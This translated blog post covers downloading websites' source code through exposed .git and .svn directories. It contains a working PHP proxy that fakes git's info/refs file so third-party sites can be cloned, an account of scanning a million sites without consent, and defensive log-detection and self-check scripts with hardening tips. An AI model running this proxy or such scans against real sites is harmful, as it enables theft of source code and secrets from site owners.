
How I downloaded the source of my own site

In September 2009, an article was published about a weakness in sites using the Subversion version control system: an exposed .svn directory lets anyone download the site's source code. Every now and then, when there was nothing to do, my brain prodded me to write a grabber and check how relevant that threat still is, but I was too lazy. However, I was haunted by a comment from Habr user Semenov.



Obviously every schoolkid has already tried to download %sitename% via .svn, so I dropped that idea right away; what my hands itched to try was git clone %sitename%/.git/.

To start, I turned off the 404 for .git* on my own site and created a git repository in the public directory...
$ git init && git add . && git commit -m 'Test'
Initialized empty Git repository in /home/ilyaplot/data/www/web/.git/
[master (root-commit) d3dcdf3] Test
15 files changed, 713 insertions(+)
.....................

Now you can try to get the newly created repository.

$ git clone http://******.com/.git/
Cloning into '******.com'...
fatal: http://******.com/.git/info/refs not found: did you run git update-server-info on the server?

As it turned out, it is not that simple. For a repository to be cloned this way (the "dumb" HTTP transport), git update-server-info has to be run in the project folder, which for obvious reasons I cannot do on someone else's server.
It turns out that only one file is missing for the plan to work: .git/info/refs, which lists the commit hash for HEAD.
Since that commit hash can be read from .git/refs/heads/master, you can simply write a proxy script that hands git what it expects to receive. A very simple PHP script is enough. I just created a controller in my Yii2 project as follows:

<?php
// Controller action behind the 'git/index' route below (class name assumed;
// $host is the <host> route parameter: "<target-host>/<path inside .git>").
class GitController extends \yii\web\Controller
{
    public function actionIndex($host)
    {
        header("Content-Type: application/octet-stream");
        if (preg_match("/^(?P<host>[\w\-\.]+)\/(?P<url>.+)/isu", $host, $matches)) {
            if ($matches['url'] == 'info/refs') {
                // Synthesise info/refs from refs/heads/master: one "<sha>\t<refname>" per line
                $ref = trim(file_get_contents('http://' . $matches['host'] . '/.git/refs/heads/master'));
                echo "{$ref}\trefs/heads/master\n"
                   . "{$ref}\trefs/remotes/origin/HEAD\n"
                   . "{$ref}\trefs/remotes/origin/master\n";
            } else {
                // Every other object git asks for is passed straight through
                echo file_get_contents('http://' . $matches['host'] . '/.git/' . $matches['url']);
            }
            exit();
        }
    }
}

And added a rule to urlManager:

[
    'pattern' => 'git/<host:[\w\-\.\/]+>',   // Yii2 parameter syntax is <name:regex>
    'route'   => 'git/index',
    'suffix'  => '',
],

Now I can try to clone my own site using my own site. There should be a joke about the monitor here.

Let's try:
$ git clone http://******.com/git/******.com
Cloning into '******.com'...
$ ls ******.com/
assets css favicon.ico images js robots.txt sitemaps

It worked! After that I checked this method on the giant sites and got what I expected: nothing. Then I took a list of the million most visited sites on the Internet and went through all of it. I expected to get a lot of source code, but there was only one successful download out of a million attempts. I got .git/refs/heads/master with a commit hash from 126 sites, but their repositories could not be cloned because the routing system of those sites returned 404 for the other files.

I was expecting more, of course, so I decided to check how many more (or fewer) sites can be downloaded via .svn. I found a Python grabber, fed it the same list of a million sites and launched it. Several hundred sites were downloaded.
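A site owner looking at the scan described above sees it from the other side: a burst of requests for /.git/ and /.svn/ paths in the access log. The following is an added example (not part of the original post) that runs that detection over constructed log lines in the common/combined format that nginx and Apache write by default; it groups VCS-metadata probes by client and separates probes the server blocked from those it actually answered, which is the real exposure.

```python
import re
from collections import defaultdict

# Any request under /.git/, /.svn/ or /.hg/ on a production site is a VCS-metadata probe.
VCS_PROBE = re.compile(r'/\.(git|svn|hg)(?:/|$)')

# Common/combined access-log layout (assumed: nginx/Apache default).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Sep/2017:10:00:01 +0300] "GET /.git/HEAD HTTP/1.1" 404 162 "-" "git/2.14.1"
203.0.113.7 - - [01/Sep/2017:10:00:02 +0300] "GET /.git/refs/heads/master HTTP/1.1" 200 41 "-" "git/2.14.1"
203.0.113.7 - - [01/Sep/2017:10:00:03 +0300] "GET /.git/info/refs HTTP/1.1" 404 162 "-" "git/2.14.1"
198.51.100.9 - - [01/Sep/2017:10:05:12 +0300] "GET /.svn/entries HTTP/1.1" 200 1289 "-" "python-requests/2.18"
192.0.2.44 - - [01/Sep/2017:10:06:00 +0300] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Sep/2017:10:06:01 +0300] "GET /css/site.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one access-log line into its fields; None if the line does not fit the format."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def find_vcs_probes(log_text):
    """Return {ip: {"requests": [(path, status), ...], "leaked": [path, ...]}}
    for every client that touched a VCS metadata directory. "leaked" holds the
    probes the server answered with 2xx, i.e. files that were actually served."""
    hits = defaultdict(lambda: {"requests": [], "leaked": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not VCS_PROBE.search(rec["path"]):
            continue
        status = int(rec["status"])
        entry = hits[rec["ip"]]
        entry["requests"].append((rec["path"], status))
        if 200 <= status < 300:
            entry["leaked"].append(rec["path"])
    return dict(hits)


if __name__ == "__main__":
    for ip, info in find_vcs_probes(SAMPLE_LOG).items():
        flag = "EXPOSED" if info["leaked"] else "blocked"
        print(f"{ip}: {len(info['requests'])} VCS probe(s), {flag}: {info['leaked']}")
```

A 2xx on /.git/refs/heads/master with 404s on everything else is exactly the pattern the post describes for the 126 sites whose routing blocked the clone; a 2xx on /.git/index or /.svn/entries means the source can be pulled and deserves an incident, not just a firewall rule.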

And in conclusion, a few tips.

  1. Right now, check whether /.git/index on your site is reachable from a regular browser.
    If you did not get a 403 or 404, the following points are for you.
  2. Configure your server so that it returns 404 for .svn and .git.
  3. Move any source code of the site that the client should not receive out of the public directory.
  4. It may be worth changing the passwords used in the configs and the admin panel URL, and removing service scripts from the public directory.
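Tip 1 can be turned into a repeatable self-check. Below is an added example (not from the post) that probes your own host for the handful of files a clone or an .svn dump needs and judges each answer by its body rather than by the status code alone: a site that answers 200 with a catch-all HTML page for any path is not exposed, while a 200 whose body starts with the git index magic "DIRC" or a 40-hex commit hash is. The path list, the signatures and the check_site/fetch helper names are this example's own choices.

```python
import re
import urllib.error
import urllib.request

# What the real file looks like, per path. A 2xx alone proves nothing on sites
# that answer every URL with a page, so each body is matched against a signature.
SIGNATURES = {
    "/.git/HEAD":              lambda b: b.startswith(b"ref: refs/heads/"),
    "/.git/refs/heads/master": lambda b: re.fullmatch(rb"[0-9a-f]{40}\s*", b) is not None,
    "/.git/index":             lambda b: b.startswith(b"DIRC"),          # git index magic
    "/.svn/entries":           lambda b: re.match(rb"\d+\n", b) is not None,  # format number
    "/.svn/wc.db":             lambda b: b.startswith(b"SQLite format 3\x00"),
}


def classify(path, status, body):
    """'blocked' (non-2xx), 'exposed' (2xx with real VCS data) or 'masked'
    (2xx but the body is something else, e.g. a catch-all page)."""
    if not 200 <= status < 300:
        return "blocked"
    return "exposed" if SIGNATURES[path](body) else "masked"


def fetch(url, timeout=5):
    """Return (status, first 4 KiB of body); network errors count as status 0."""
    req = urllib.request.Request(url, headers={"User-Agent": "vcs-self-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(4096)
    except urllib.error.HTTPError as e:
        return e.code, b""
    except urllib.error.URLError:
        return 0, b""


def check_site(host, scheme="http", fetcher=fetch):
    """Probe every path in SIGNATURES on your own host; returns {path: verdict}.
    `fetcher` is injectable so the logic can be exercised offline."""
    results = {}
    for path in SIGNATURES:
        status, body = fetcher(f"{scheme}://{host}{path}")
        results[path] = classify(path, status, body)
    return results


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "example.com"  # placeholder host
    for path, verdict in check_site(host).items():
        print(f"{verdict:8} {path}")
```

Run it as python3 vcs_check.py your-site.example against a host you own; any "exposed" line means tip 2 has not been applied yet. For nginx, a location block such as location ~ /\.(git|svn|hg) { return 404; } covers the whole directory rather than a single file, and the check above should come back all "blocked" once it is in place.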

For obvious reasons I cannot say exactly which sites I managed to clone, but I can say for sure that the owners of those sites have already received a letter from me pointing out the flaw.

UPD:
kaimi_ru shared a link to scripts for five version control systems: github.com/kost/dvcs-ripper

Source: https://habr.com/ru/post/334864/

